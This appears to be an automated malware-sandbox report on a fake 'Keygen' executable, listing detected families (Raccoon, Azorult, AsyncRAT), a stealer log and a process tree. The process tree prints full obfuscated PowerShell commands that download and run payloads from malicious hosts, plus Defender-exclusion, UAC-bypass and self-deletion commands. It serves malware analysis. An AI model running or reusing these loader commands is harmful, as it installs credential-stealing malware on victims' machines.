Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

8

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

8

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    66s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (30).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 03:52:33 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (805 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 3 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (30).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (30).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3172
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\262B.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (30).exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Users\Admin\AppData\Local\Temp\262B.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:2644
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\262B.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3376
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:932
          • C:\Users\Public\oku.exe
            "C:\Users\Public\oku.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5068
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4300
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4500
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 4500 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\613761537130222\\* & exit
                  8⤵
                    PID:4356
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 4500
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4164
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:3860
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4572
              • C:\Users\Public\oku.exe
                "C:\Users\Public\oku.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:4408
                • C:\Users\Admin\AppData\Local\Temp\NxmaBrdzQA.exe
                  "C:\Users\Admin\AppData\Local\Temp\NxmaBrdzQA.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3968
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\NxmaBrdzQA.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2808
                • C:\Users\Admin\AppData\Local\Temp\HmVWClaJIM.exe
                  "C:\Users\Admin\AppData\Local\Temp\HmVWClaJIM.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2600
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:5448
                  • C:\Users\Admin\AppData\Local\Temp\V1hsBq1Itb.exe
                    "C:\Users\Admin\AppData\Local\Temp\V1hsBq1Itb.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:3024
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\qwdzwmf4.inf
                      8⤵
                        PID:4904
                    • C:\Users\Admin\AppData\Local\Temp\GzKVM7lx6T.exe
                      "C:\Users\Admin\AppData\Local\Temp\GzKVM7lx6T.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2352
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4380
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\oku.exe"
                      7⤵
                        PID:2348
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:5112
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\262B.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:416
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3664
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:3960
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\262B.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3996
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
